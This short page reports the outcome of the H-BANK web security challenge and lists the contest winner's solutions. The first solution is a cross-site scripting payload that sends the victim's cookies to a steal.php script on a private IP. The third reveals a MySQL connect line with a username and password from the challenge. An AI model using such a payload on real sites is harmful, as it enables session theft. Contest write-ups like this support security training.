H-BANK Outcome: H-BANK Web Security Challenge (#2)

Interested in the challenge source code and solutions? Download the PDF!

ISGroup-HBANK-Challenge

Solutions provided by Giacomo Rizzi, the winner of the contest:

Challenge 1: H-FARM</textarea><script> (new Image()).src=”http://10.1.2.172/steal.php?cookies=”+document.cookie;</script><!–

Challenge 2: UGOTMEMADHAXOR!

Challenge 3: $link = mysql_connect(‘127.0.0.1’, ‘hackmehard’, ‘Psvm6bPywNQsaMNR’);